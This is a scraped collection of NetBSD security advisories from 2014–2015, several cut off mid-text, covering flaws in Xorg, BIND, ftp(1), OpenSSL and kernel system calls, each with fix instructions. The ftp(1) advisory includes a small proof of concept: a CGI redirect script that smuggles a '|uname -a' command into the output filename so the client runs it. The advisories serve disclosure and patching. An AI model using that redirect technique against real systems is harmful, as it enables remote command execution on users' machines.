-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2015-001 = Topic: Protocol handling issues in X Window System servers Version:NetBSD-current: affected prior to 2014-12-22 NetBSD 7_BETA*: affected NetBSD 6.1*:affected NetBSD 6.0*:affected NetBSD 5.2*:affected NetBSD 5.1*:affected pkgsrc: x11/xorg-server package prior 1.12.4nb7 Severity: Local Privilege Escalation, Arbitrary Code Execuation Fixed: NetBSD-current: December 22th, 2014 NetBSD-7 branch:December 22th, 2014 NetBSD-6 branch:December 22th, 2014 NetBSD-6-1 branch: December 22th, 2014 NetBSD-6-0 branch: December 22th, 2014 NetBSD-5 branch:December 22th, 2014 NetBSD-5-2 branch: December 22th, 2014 NetBSD-5-1 branch: December 22th, 2014 pkgsrc 2014Q4: xorg-server-1.12.4nb7 corrects this issue Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A large number of issues in the way the Xorg server processes requests have been discovered by Ilja van Sprundel, a security researcher with IOActive. These issues could allow local users the ability to attack a setuid Xorg server. These problems are documented in CVE-2014-8091 to CVS-2014-8103. http://www.x.org/wiki/Development/Security/Advisory-2014-12-09/ Additionally, CVE-2013-6424 is also fixed with these updates. Technical Details = The issues come in 3 main categories: - - Denial of service due to unchecked malloc in client authentication CVE-2014-8091: SUN-DES-1 - - Integer overflows calculating memory needs for requests CVE-2014-8092: X11 core protocol requests CVE-2014-8093: GLX extension CVE-2014-8094: DRI2 extension CVE-2013-6424: EXA and render extensions - - Out of bounds access due to not validating length or offset values in requests CVE-2014-8095: XInput extension CVE-2014-8096: XC-MISC extension CVE-2014-8097: DBE extension CVE-2014-8098: GLX extension CVE-2014-8099: XVideo extension CVE-2014-8100: Render extension CVE-2014-8101: RandR extension CVE-2014-8102: XFixes extension CVE-2014-8103: DRI3 Present extensions Solutions and Workarounds = To apply a fixed version from a releng build, fetch a fitting xserver.tgz from nyftp.netbsd.org and extract the fixed binaries: cd /var/tmp ftp http://nyftp.netbsd.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/xserver.tgz cd / tar xzpf /var/tmp/xserver.tgz ./usr/X11R?/bin/X\* tar xzpf /var/tmp/xserver.tgz ./usr/X11R?/lib/modules/extensions as well as architecture-specific X servers. with the following replacements: REL = the release version you are using BUILD = the source date of the build. 20141223* and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your Xorg server binaries by updating your source tree and rebuilding and installing a new version of Xorg server. The following instructions describe how to upgrade your Xorg server binaries by updating your source tree and rebuilding and installing a new version of Xorg server. * NetBSD-current: Systems running NetBSD-current dated from before 2014-12-21 should be upgraded to NetBSD-current dated 2014-12-22 or later. The following files/directories need to be updated from the netbsd-current CVS branch (aka HEAD): xsrc/external/mit/xorg-server/dist xsrc/xfree/xc/programs/Xserver To update from CVS, re-build, and re-install Xorg server: # cd xsrc # cvs update -d -P external/mit/xorg-server/dist # cd .. # cd src # cd external/mit/xorg/server/xorg-server # make USETOOLS=no cleandir dependall # make USETOOLS=no install For the acorn32, alpha, amiga, mac68k, pmax and sun3 ports, the following instructions should be used: # cd xsrc # cvs update -d -P xfree/xc/programs/Xserver # cd .. # cd src # cd x11/Xserver # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 6.*: Systems running NetBSD 6.* sources dated from before 2014-12-21 should be upgraded from NetBSD 6.* sources dated 2014-12-22 or later. The following files/directories
NetBSD Security Advisory 2015-002: bind Denial of Service (CVE-2014-8500)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2015-002 = Topic: bind Denial of Service (CVE-2014-8500) Version:NetBSD-current: source prior to Dec 10, 2014 NetBSD 7 Beta: affected NetBSD 6.1: affected NetBSD 6.0: affected NetBSD 5.2: affected NetBSD 5.1: affected Severity: Denial of Service Fixed: NetBSD-current: Dec 11, 2014 NetBSD-7 branch:Jan 06, 2015 NetBSD-6 branch:Jan 06, 2015 NetBSD-6-1 branch: Jan 06, 2015 NetBSD-6-0 branch: Jan 06, 2015 NetBSD-5 branch:Dec 26, 2014 NetBSD-5-2 branch: Dec 26, 2014 NetBSD-5-1 branch: Dec 26, 2014 Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A lack of defense against arbitrarily long delegation chains can be exploited to crash bind. This primarily concerns resolvers that resolve third-party controlled domains; authoritative servers can only be affected if an attacker can control a delegation that the authoritative server needs to traverse to service the zone. This vulnerability has been assigned CVE-2014-8500. Technical Details = By making use of maliciously-constructed zones or a rogue server, an attacker can exploit an oversight in the code BIND uses to follow delegations in the Domain Name Service, causing BIND to issue unlimited queries in an attempt to follow the delegation. This can lead to resource exhaustion and denial of service (up to and including termination of the named server process.) The fix introduces a config setting to determine at which length named will stop following the delegation chain and return a failure instead. Solutions and Workarounds = There is no practical workaround (the impractical is not to try to resolve malicious zones). Solutions: + Install and use a bind package from pkgsrc. + Update named from a daily build later than the fix date: fetch from http://nyftp.NetBSD.org/pub/NetBSD-daily/branch/date/arch/ the file binary/sets/base.tgz for all releases: cd / tar xzpf base.tgz-path ./usr/sbin/named \ ./usr/lib/libbind9.so\* \ ./usr/lib/libisc.so\* \ ./usr/lib/libdns.so\* \ ./usr/lib/libisccfg.so\* \ ./usr/lib/liblwres.so\* \ ./usr/lib/libisccc.so\* If you use debug or profiling libraries or build static binaries with bind libs, also install the updated versions from the comp.tgz or debug.tgz. + Rebuild your system with the fixes applied. NetBSD-current, NetBSD-7, NetBSD-6: For better maintainability bind was updated to the latest ISC release of the bind branch. This means updating just the files containing the vulnerable code won't work. Updating src/external/bsd/bind also won't be enough since all the bind libraries got version bumps, and src/distrib/sets/lists/* will also need selective updates. For this reason, updating the entire src tree and recompiling is recommended. NetBSD-5: fixed versions are (relative to src/dist/bind): Filenetbsd-5 netbsd-5-2 netbsd-5-1 bin/named/config.c 1.1.1.8.4.5 1.1.1.8.4.4.2.1 1.1.1.8.4.1.2.4 bin/named/query.c 1.8.4.9 1.8.4.7.2.2 1.8.4.2.2.7 bin/named/server.c 1.1.1.9.4.5 1.1.1.9.4.4.2.1 1.1.1.9.4.1.2.4 lib/dns/adb.c 1.6.4.5 1.6.4.4.2.1 1.6.4.1.2.4 lib/dns/resolver.c 1.8.4.7 1.8.4.6.2.1 1.8.4.2.2.5 lib/dns/include/dns/adb.h 1.1.1.5.4.4 1.1.1.5.4.3.2.1 1.1.1.5.12.4 lib/dns/include/dns/resolver.h 1.1.1.5.4.5 1.1.1.5.4.4.2.1 1.1.1.5.4.1.2.4 lib/export/isc/Makefile.in 1.1.2.4 1.1.2.3.2.1 1.1.4.5 lib/isc/Makefile.in 1.1.1.6.4.5 1.1.1.6.4.4.2.1 1.1.1.6.4.1.2.4 lib/isc/include/isc/Makefile.in 1.1.1.5.4.5 1.1.1.5.4.4.2.1 1.1.1.5.4.1.2.4 lib/isc/include/isc/types.h 1.1.1.5.4.5 1.1.1.5.4.4.2.1 1.1.1.5.4.1.2.4 lib/isccfg/namedconf.c 1.1.1.7.4.5 1.1.1.7.4.4.2.1 1.1.1.7.4.1.2.4 lib/isc/counter.c 1.1.2.1 1.1.4.2 1.1.6.2 lib/isc/include/isc/counter.h 1.1.2.1 1.1.4.2 1.1.6.2 supporting files: src/lib/libisc/Makefile 1.2.4.3 1.2.4.2.2.1 1.2.4.1.2.2 src/usr.sbin/bind/Makefile.inc 1.32.4.2 1.32.4.1.2.1 1.32.12.2 To update from CVS, re-build and re-install the system: # cd src # cvs update -d -P -r VERSION FILE # cd lib/isc # make USETOOLS=no cleandir dependall # make USETOOLS=no install
NetBSD Security Advisory 2014-013: ftp(1) can be made to execute arbitrary commands by a malicious webserver
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-013 = Topic: ftp(1) can be made to execute arbitrary commands by a malicious webserver Version:NetBSD-current: source prior to Oct 27th, 2014 NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected pkgsrc (net/tnftp) affected Severity: remote command execution Fixed: NetBSD-current: Oct 26th, 2014 NetBSD-7 branch:Oct 26th, 2014 NetBSD-6-0 branch: Oct 27th, 2014 NetBSD-6-1 branch: Oct 27th, 2014 NetBSD-6 branch:Oct 27th, 2014 NetBSD-5-2 branch: Oct 27th, 2014 NetBSD-5-1 branch: Oct 27th, 2014 NetBSD-5 branch:Oct 27th, 2014 pkgsrc: in version 20141031 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A malicious http server can cause ftp(1) to execute arbitrary commands. This vulnerability has been assigned CVE-2014-8517. Technical Details = If the ftp(1) program is used to act as http client and fetch data from a website, and no output file is passed via the -o argument, the client can be tricked into executing arbitrary commands. When acting as http client, the ftp(1) program will follow http redirects, and uses the part of the path after the last '/' from the last resource it accesses as the output filename (as long as -o filename is not specified). After the output filename is resolved by the ftp client, if the rest of the output filename begins with a '|', the output filename is passed to popen(3). Thus, a malicious web site could hide '|command' in a redirect and make the client execute 'command' when ftp fetched that URL. a20$ pwd /var/www/cgi-bin a20$ ls -l total 4 -rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect -rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a a20$ cat redirect #!/bin/sh echo 'Status: 302 Found' echo 'Content-Type: text/html' echo 'Connection: keep-alive' echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a' echo a20$ a20$ ftp http://localhost/cgi-bin/redirect Trying ::1:80 ... ftp: Can't connect to `::1:80': Connection refused Trying 127.0.0.1:80 ... Requesting http://localhost/cgi-bin/redirect Redirected to http://192.168.2.19/cgi-bin/|uname%20-a Requesting http://192.168.2.19/cgi-bin/|uname%20-a 32 101.46 KiB/s 32 bytes retrieved in 00:00 (78.51 KiB/s) NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014 Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE BOARD evbarm a20$ Solutions and Workarounds = Workaround: specifying an output filename by using ftp -o filename circumvents the issue. Solution: Get a new ftp binary: VERS being your NetBSD version DATE being a build date past the fix date for your version ARCH being your machine architecture ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz cd / tar xzpf /var/tmp/base.tgz ./usr/bin/ftp or build a new ftp binary from source. Affected file: src/usr.bin/ftp/fetch.c Fixed versions: HEAD 1.206 netbsd-7 1.205.4.1 netbsd-6 1.195.2.2 netbsd-6-1 1.195.8.1 netbsd-6-0 1.195.6.1 netbsd-5 1.185.6.3 netbsd-5-2 1.185.6.2.4.1 netbsd-5-1 1.185.14.1 Thanks To = Thanks to Jared McNeill, who found the issue by code inspection, and Christos Zoulas for changing ftp(1) to only use | commands for user supplied names. Revision History 2014-11-03 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-013.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (NetBSD) iQIcBAEBAgAGBQJUV/DOAAoJEAZJc6xMSnBuWXsP/0JHubPskhuwiD04WK3QKqxS 7pI2767yoGuXQwdzEiIYiy2h3Fu8nc/ajLEeUwBn4opEI2tXOTkspjdMO+zqFN+Z
NetBSD Security Advisory 2014-014: Multiple vulnerabilities in the mount system call
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-014 = Topic: Multiple vulnerabilities in the mount system call Version:NetBSD-current: source prior to Sun, Apr 20th 2014 NetBSD 6.1.5: not affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0.6: not affected NetBSD 6.0 - 6.0.5: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected Severity: Local DoS Fixed: NetBSD-current: Sun, Apr 20th 2014 NetBSD-6-0 branch: Mon, 21 Apr 2014 NetBSD-6-1 branch: Mon, 21 Apr 2014 NetBSD-6 branch:Mon, 21 Apr 2014 NetBSD-5-2 branch: Tue, 29 Apr 2014 NetBSD-5-1 branch: Tue, 29 Apr 2014 NetBSD-5 branch:Sat, 26 Apr 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Due to: - missing input validation checks in the mount syscall - a wrong assumption on the file systems side - a memory corruption bug the kernel could: - allocate an unbounded or zero-sized memory buffer - dereference a NULL pointer - behave unexpectedly Technical Details = The mount syscall takes as fourth and fifth arguments an input buffer and its size. A kernel buffer of the same size is allocated via kmem, and is then handed over to the appropriate file system. This buffer is then freed when no longer needed. The checks on the size of the kernel-allocated buffer were not strict enough, and a local user could easily make the kernel perform a zero- sized or unbounded memory allocation, resulting in a crash. Also, in particular cases, the buffer pointer given to the underlying file systems is allowed to be NULL - some file systems don't need it. The others didn't explicitly check for NULL, and were wrongly making the assumption that it was always a valid, readable buffer, causing the kernel to panic with a page fault. Finally, a bug could corrupt memory when freeing the kernel-allocated buffer. The buffer is freed via kmem_free, whose second argument indicates the size of the allocated buffer. This size was held by a local variable which was modified by the underlying file systems, thus creating a memory inconsistency when freeing which could lead to a crash or unexpected behavior. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: files relative to src/sys/fs/: HEAD netbsd-6 netbsd-6-1netbsd-6-0netbsd-5 netbsd-5-2netbsd-5-1 ---- ---- adosfs/advfsops.c 1.70 1.63.6.1 1.63.12.1 1.63.10.1 1.53.6.1 1.53.20.1 1.53.16.1 cd9660/cd9660_vfsops.c 1.84 1.74.6.1 1.74.12.1 1.74.10.1 1.63.6.2 1.63.6.1.6.1 1.63.6.1.2.1 efs/efs_vfsops.c 1.25 1.22.8.1 1.22.14.1 1.22.12.1 1.16.4.2 1.16.4.1.10.1 1.16.4.1.6.1 filecorefs/filecore_vfsops.c 1.76 1.68.6.1 1.68.12.1 1.68.10.1 1.55.6.1 1.55.20.1 1.55.16.1 hfs/hfs_vfsops.c 1.31 1.27.8.2 1.27.8.1.6.1 1.27.8.1.4.1 1.19.4.1 1.19.16.1 1.19.12.1 msdosfs/msdosfs_vfsops.c 1.107 1.93.6.2 1.93.6.1.6.1 1.93.6.1.4.1 1.68.6.3 1.68.6.2.10.1 1.68.6.2.6.1 nilfs/nilfs_vfsops.c 1.16 1.8.6.1 1.8.12.1 1.8.10.1 n/an/a n/a ntfs/ntfs_vfsops.c 1.94 1.87.6.1 1.87.20.1 1.87.12.1 1.72.6.2 1.72.6.1.6.1 1.72.6.1.2.1 ptyfs/ptyfs_vfsops.c 1.50 1.42.18.2 1.42.18.1.4.1 1.42.18.1.2.1 1.37.4.1 1.37.18.1 1.37.14.1 puffs/puffs_vfsops.c 1.110 1.100.8.3 1.100.8.2.6.1 1.100.8.2.4.1 1.81.8.4 1.81.8.3.2.1 1.81.8.1.2.1 smbfs/smbfs_vfsops.c 1.100 1.95.8.1 1.95.22.1 1.95.14.1 1.85.4.2 1.85.4.1.6.1 1.85.4.1.2.1 sysvbfs/sysvbfs_vfsops.c 1.43 1.38.6.2 1.38.6.1.6.1 1.38.6.1.4.1 1.26.4.1 1.26.18.1 1.26.14.1 tmpfs/tmpfs_vfsops.c 1.59 1.52.8.1 1.52.22.1 1.52.14.1 1.44.4.1 1.44.22.1 1.44.18.1 udf/udf_vfsops.c 1.67 1.62.6.1 1.62.12.1 1.62.10.1 1.52.2.4 1.52.2.3.6.1 1.52.2.3.2.1 union/union_vfsops.c
NetBSD Security Advisory 2014-015: OpenSSL and SSLv3 vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-015 = Topic: OpenSSL and SSLv3 vulnerabilities Version:NetBSD-current: source prior to Oct 18th, 2014 NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected Severity: confidentiality breach, remote DoS Fixed: NetBSD-current: Oct 17th, 2014 NetBSD-7 branch:Oct 19th, 2014 NetBSD-6-0 branch: Oct 26th, 2014 NetBSD-6-1 branch: Oct 26th, 2014 NetBSD-6 branch:Oct 26th, 2014 NetBSD-5-2 branch: Oct 19th, 2014 NetBSD-5-1 branch: Oct 19th, 2014 NetBSD-5 branch:Oct 19th, 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract This advisory covers the OpenSSL Security Advisory of Oct 15th, 2014, which lists four different vulnerabilities: SRTP Memory Leak (CVE-2014-3513), a remotely DoSable memory leak (not present in NetBSD 5.*) Session Ticket Memory Leak (CVE-2014-3567), a remotely DoSable memory leak SSLv3 has recently been shown to be breakable by an attacker able to intercept the data stream between the communication partners (POODLE, CVE-2014-3566). OpenSSL has added a mitigation mechanism: SSL 3.0 Fallback protection - add support for TLS_FALLBACK_SCSV which signals not to do downgrades to SSLv3 from TLS Build option no-ssl3 is incomplete (CVE-2014-3568), OpenSSL explicitly built with no SSLv3 support would still use this protocol as a fallback. Technical Details = see https://en.wikipedia.org/wiki/POODLE for the SSLv3 protocol vulnerability and http://www.openssl.org/news/secadv_20141015.txt for the OpenSSL issues. Solutions and Workarounds = Disable SSLv3 in servers and clients. Update the OpenSSL libraries so the prohibition of SSLv3 actually works. Make sure the old libssl is no longer in use. While the issue is only in libssl, unrelated source changes make it adviseable to update libcrypto as well. - From source: +--- Update src and rebuild and install. Note: OpenSSL in NetBSD-6 and NetBSD-current has been updated to version 1.0.1j; updating the entire src tree is recommended. - From tarballs: +- To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz from a daily build later than the fix dates, from http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/ with a date later than the fix date for your branch as listed above, and your release version and architecture (e.g. http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201410250200Z/amd64/binary/sets/), and then extract the files: Shared libraries: tar xzpf base.tgz \*libssl\* \*libcrypto\* And static libraries and linker config files: tar xzpf comp.tgz \*libssl\* \*libcrypto\* Get the fixed library into use +- Since the vulnerability is in a shared library, getting the old library purged and the fixed one into use requires restarting all programs that load libssl. The easiest way to do this is to reboot the system. Another method: using /bin/sh, ps ax -o pid | (while read pid; do \ pmap $pid | egrep '(libssl|libcrypto)' echo found $pid ;\ done) will find non-chrooted programs that have the affected libraries open; restart them. sshd will not show up in this list since it runs chrooted and re-exec'ed but also needs to be restartet. ldd programname will show the shared libraries a program will want to use. Fixed versions, code only; note updating only these files will not work due to additional changes, but updating the subdirectoriess e.g. from anoncvs will: relative to src/crypto/external/bsd/openssl/dist: FileHEADnetbsd-7 + apps/s_client.c 1.7 1.6.2.1 crypto/err/openssl.ec 1.2 1.1.1.1.26.1 ssl/d1_lib.c1.2 1.1.1.6.2.1 ssl/d1_srtp.c 1.2 1.1.1.2.10.1 ssl/dtls1.h 1.2 1.1.1.5.10.1 ssl/s23_clnt.c 1.7 1.6.2.1 ssl/s23_srvr.c 1.2 1.1.1.4.2.1 ssl/s2_lib.c1.2 1.1.1.2.2.1 ssl/s3_enc.c1.7 1.6.2.1 ssl/s3_lib.c1.121.11.2.1 ssl/ssl.h 1.9 1.8.2.1 ssl/ssl3.h 1.7 1.6.2.1 ssl/ssl_err.c 1.7 1.6.2.1 ssl/ssl_lib.c 1.2 1.1.1.9.2.1 ssl/t1_enc.c1.111.10.2.1 ssl/t1_lib.c1.141.13.2.1 ssl/tls1.h 1.2 1.1.1.5.2.1 File
NetBSD Security Advisory 2014-009: Multiple vulnerabilities in the execve system call
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-009 = Topic: Multiple vulnerabilities in the execve system call Version:NetBSD-current: source prior to Fri, Feb 14th 2014 NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.4: affected NetBSD 6.0.5: not affected NetBSD 5.1 - 5.1.4: not affected NetBSD 5.2 - 5.2.2: not affected Severity: Local DoS Fixed: NetBSD-current: Fri, Feb 14th 2014 NetBSD-6-0 branch: Fri, Feb 14th 2014 NetBSD-6-1 branch: Fri, Feb 14th 2014 NetBSD-6 branch:Fri, Feb 14th 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract The execve system call is affected by two vulnerabilities: 1) A memory leak in the kernel could cause a local (un)privileged user to use up kernel memory via a bogus ELF binary, and thus to freeze - or eventually panic - the system. 2) A bug in the kernel could lead to a use-after-free condition when loading a binary or a script, which would allow a local (un)privileged user to crash the system. Technical Details = 1) When trying to execute an ELF binary, the kernel looks up the corresponding interpreter (in case of native dynamic ELF binaries: the dynamic linker ld.elf_so). If this interpreter cannot be accessed appropriately, or if it is bogus, a structure allocated to hold special information on this interpreter was not freed. If a standard toolchain is installed, a local user can easily create such broken binaries by passing the -dynamic-linker switch to the linker. 2) When executing a binary via execve(), the kernel computes the new user stack size, and returns an error if this size exceeds the maximum architecture-defined stack size or the maximum stack size allowed by the calling process through rlimit. However, the variable in charge of hold- ing the error code returned was not properly initialised, causing the kernel to keep setting up the new process environment and use data that was already freed. Both the new stack size and the rlimit stack size are approximately user-controllable, which makes it easy to trigger from a local user. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILEHEADnetbsd-6netbsd-6-1 netbsd-6-0 -- -- sys/kern/exec_elf.c 1.551.37.2.21.37.2.1.6.11.37.2.1.4.1 sys/kern/kern_exec.c 1.403 1.339.2.9 1.339.2.6.2.2 1.339.2.5.4.3 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/kern/exec_elf.c # cvs update -d -P -r VERSION sys/kern/kern_exec.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Thanks to Maxime Villard, who found the issues and provided fixes. Revision History 2014-08-27 Initial release 2014-09-08 Updated affected versions More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-009.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2014-009.txt,v 1.4 2014/09/02 14:26:27 spz Exp $ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJUDhAXAAoJEAZJc6xMSnBuD/kP/RJjOcVNjN9wNSDWZCz5sZ63 WxzysstN2R9OCheAYJeNOYrgQYx2f26mR1pJJQ1nR254PHnqultYMptYbF/dh9SQ SFg+PemHj6Qnjp9BZ9PuXNvU4g16qfaYhgWfUE3u+Iz/2MsNtJC3pcMfmol/dtnG vafgb5zngFb6Ea03jbdsTPRFSAloPDVkxtMQ+Ib+vkP8NLHGQZsSnrEdQv3CLl0Y
NetBSD Security Advisory 2014-011: User-controlled memory allocation in the modctl system call
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-011 = Topic: User-controlled memory allocation in the modctl system call Version:NetBSD-current: source prior to Thu, Jul 10th 2014 NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected Severity: Local DoS Fixed: NetBSD-current: Thu, Jul 10th 2014 NetBSD-6-1 branch: Mon, Jul 14th 2014 NetBSD-6-0 branch: Mon, Jul 14th 2014 NetBSD-6 branch:Mon, Jul 14th 2014 NetBSD-5.2 branch: Mon, Jul 14th 2014 NetBSD-5.1 branch: Mon, Jul 14th 2014 NetBSD-5 branch:Mon, Jul 14th 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Due to missing input validation checks, a local (un)privileged user could cause the kernel to perform a zero-sized or unbounded memory allocation, resulting in a crash. Technical Details = The modctl system call takes as second argument a buffer which is represented as a structure when loading a kernel module. This structure indicates special information on how to load a module, including a string pointer and the length of the string pointed to. A kernel buffer of the same size is allocated, but no check was performed to ensure the size is neither too low nor too high, thus allowing a local user to crash the system. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-6 netbsd-6-1 netbsd-6-0 netbsd-5 netbsd-5-2 netbsd-5-1 -- -- -- -- sys/kern/sys_module.c 1.15 1.13.8.1 1.13.14.1 1.13.12.1 1.8.4.2 1.8.4.1.6.1 1.8.4.1.2.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/kern/sys_module.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Thanks to Maxime Villard, who found the issue and provided a fix. Revision History 2014-08-27 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-011.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2014-011.txt,v 1.3 2014/08/30 07:00:29 maxv Exp $ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJUDhArAAoJEAZJc6xMSnBuHygP/juhVWWrWtPQQzGbCE9Jksqn SEvyoNvSNtjUdp+1gSqsZe8x7xYg2DNaGqvVORYVm9fpP7Kn5//7ub1GaI1PNbVP +7Vn4jtNs+jeMrhLo5yAhSilb3DorRTIzvhkyNmU1P9zwAaHuV1PNIjBDkmXN3mL JbxSf6/X5xcSl3gCmE6UE+sQ45bvLVMnKEv0cuNO6CLxf0YKuJCTyp6Wh55bzjPq Vw64j2WLB1mU/EVhF7GHHQ1QhnpoGnZ1UwYxVlqeH1dR+9RPYj1Kjh784kDOVN6K j2yulxDLrz07we1IEqmWW7slLK3qWRARLJgEDd6NEiB677GImuYDRYtEdUFI/wSV NcoDXCAoFeFuvZUqjFCbKmcC0bBrfoBbRLvuLyogAZ51iAbUpJpUwn6BamftcRo/ 2qKwdNDbaqXvXTGeaF98DKR+RsiG69Z1P9l2OmzSV29Jn2WC9Tz5Dbh2Dd5fsHQV t0tCCApbI2UiLu4OFi9DhxhraiO0gBlPaTjtnc1fnyLapjw4lZFo2q6xnHmrtj4l CYTQuVghHly4yeDHPMISpipmgzx9Z/lQadUejbv65j1Id4PLMPSezNKzSZJRy+D2 I7cv0rn0nT2PVDNRbmsVpZCiJjILKI4GXcwpXfKEma/dEeqJjuClwe5P/zZffYOx 4y8sbEeOXHwBqmF76e+d =wcom -END PGP SIGNATURE-
NetBSD Security Advisory 2014-012: Memory leak in the setsockopt system call
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2014-012 = Topic: Memory leak in the setsockopt system call Version:NetBSD-current: source prior to Sat, Aug 16th 2014 NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected Severity: Local DoS Fixed: NetBSD-current: Sat, Aug 16th 2014 NetBSD-7 branch:Sun, Aug 24th 2014 NetBSD-6-0 branch: Wed, Aug 27th 2014 NetBSD-6-1 branch: Wed, Aug 27th 2014 NetBSD-6 branch:Wed, Aug 27th 2014 NetBSD-5.2 branch: Wed, Aug 27th 2014 NetBSD-5.1 branch: Wed, Aug 27th 2014 NetBSD-5 branch:Wed, Aug 27th 2014 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A memory leak in the kernel could allow a local user to use up kernel memory via repeated calls to the setsockopt system call, and thus to freeze - or eventually panic - the system. Technical Details = When calling the setsockopt system call on an ipv6 socket with specific arguments, a kernel buffer allocated to temporarily hold the socket option data was not freed. Performing such a call in a loop would cause the kernel to run out of memory and eventually panic. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, 